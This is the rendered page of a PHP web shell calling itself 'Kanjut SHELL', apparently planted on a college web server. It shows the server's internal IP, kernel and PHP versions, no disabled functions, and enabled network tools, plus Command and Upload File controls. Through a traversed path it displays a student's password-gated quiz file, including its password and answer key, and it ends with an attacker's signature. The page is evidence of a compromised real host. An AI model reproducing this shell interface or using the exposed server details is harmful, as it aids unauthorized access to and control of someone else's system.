Kanjut SHELL
Server IP : 172.16.15.8  /  Your IP : 13.58.188.166
Web Server : Apache
System : Linux zeus.vwu.edu 4.18.0-553.27.1.el8_10.x86_64 #1 SMP Wed Nov 6 14:29:02 UTC 2024 x86_64
User : apache ( 48)
PHP Version : 7.2.24
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON
Directory (0755) :  /home/kjhu/../vahigginbotham/www/

[  Home  ][  C0mmand  ][  Upload File  ]

Current File : /home/kjhu/../vahigginbotham/www/Assignment2b.php
<?php	session_start();

/*
        Assignment 2B
        Goal: Web exam with 4 questions, answers 1-A
                2-B, 3-C, 4-D
*/
	$pass = $_SESSION['password'];
	$_SESSION['password'] = $pass;
	if($pass != "hw4b")
		print "Go Away <br> ";
	else
	{
?>

<CENTER>
<H2>
Web Exam
</H2>
<HR>
<Form action=action4a2.php method=post>
How many days are in the month of January?
<INPUT type=radio name=question value=31> 31
<INPUT type=radio name=question value=29> 29
<INPUT type=radio name=question value=30> 30
<INPUT type=radio name=question value=28> 28
<P>
How many teams does Major League Baseball consist of?
<INPUT type=radio name=question1 value=31> 31
<INPUT type=radio name=question1 value=30> 30
<INPUT type=radio name=question1 value=40> 40
<INPUT type=radio name=question1 value=41> 41
<P>
When was Virginia Wesleyan College founded?
<INPUT type=radio name=question2 value=1974> 1974
<INPUT type=radio name=question2 value=1950> 1950
<INPUT type=radio name=question2 value=1961> 1961
<INPUT type=radio name=question2 value=1955> 1955
<P>
What is the name given to the Nike logo?
<INPUT type=radio name=question3 value=sweep> sweep
<INPUT type=radio name=question3 value=swift> swift
<INPUT type=radio name=question3 value=swipe> swipe
<INPUT type=radio name=question3 value=swoosh> swoosh
<P>
<INPUT type=submit value=Submit>
<?php
}
?>

</form>

Stv3n404 - 2023